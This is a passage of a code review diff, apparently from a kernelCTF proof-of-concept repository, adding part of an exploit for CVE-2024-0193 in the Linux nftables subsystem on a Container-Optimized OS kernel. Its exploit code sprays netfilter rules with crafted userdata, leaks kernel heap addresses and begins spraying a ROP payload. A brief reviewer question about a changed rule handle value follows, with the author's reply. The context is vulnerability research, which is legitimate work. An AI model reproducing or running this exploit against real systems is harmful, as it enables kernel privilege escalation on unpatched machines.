pocs/linux/kernelctf/CVE-2024-0193_cos/exploit/cos-105-17412.226.52/exploit.c

```diff
@@ -0,0 +1,864 @@
+
+    struct nftnl_rule * rule_spray2 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_spray2, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_spray2, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u32(rule_spray2, NFTNL_RULE_FAMILY, family);
+    nftnl_rule_set_data(rule_spray2, NFTNL_RULE_USERDATA, rule_data, 96-25);
+
+    memset(rule_data, 'c', 0x400);
+
+    make_payload2((uint64_t*)(rule_data+7));
+
+    struct nftnl_rule * rule_spray = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_spray, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_spray, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u32(rule_spray, NFTNL_RULE_FAMILY, family);
+    nftnl_rule_set_data(rule_spray, NFTNL_RULE_USERDATA, rule_data, 192-25);
+
+    batch = mnl_nlmsg_batch_start(buf, buf_size);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_spray2);
+    mnl_nlmsg_batch_next(batch);
+
+    for(int i = 0; i < 4; i++){
+        nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
+        nftnl_rule_nlmsg_build_payload(nlh, rule_spray);
+        mnl_nlmsg_batch_next(batch);
+    }
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    // Leak heap
+    memset(read_data, 0, 0x1000);
+
+    rule_get = nftnl_rule_alloc();
+    nftnl_rule_set_str(rule_get, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_get, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u64(rule_get, NFTNL_RULE_HANDLE, 0x6);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, family, NLM_F_ACK, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_get);
+    nftnl_rule_free(rule_get);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    ret = mnl_socket_recvfrom(nl, read_data, 0x400);
+
+    if (ret > 0) {
+        heap_addr1 = *(unsigned long*) &read_data[0x78];
+        heap_addr2 = *(unsigned long*) &read_data[0x70];
+        ret = mnl_socket_recvfrom(nl, read_data, 0x200);
+    }
+
+    printf("[*] heap_addr %lx %lx\n", heap_addr1, heap_addr2);
+
+    if((heap_addr1 & 0xffff000000000000) != 0xffff000000000000){
+        printf("[-] heap leak failed..\n");
+        return -1;
+    }
+
+    // Spray ROP payload
+    struct nftnl_rule * rule_del = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_del, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_del, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u64(rule_del, NFTNL_RULE_HANDLE, 0x1109);
```

Comment:
Looks like the size of NFTNL_RULE_HANDLE was changed from 0x1019 to 0x1109. Could you explain why?

Reply:
This is because I used different `SET_SPRAY`, which affects the handle value, for optimizing.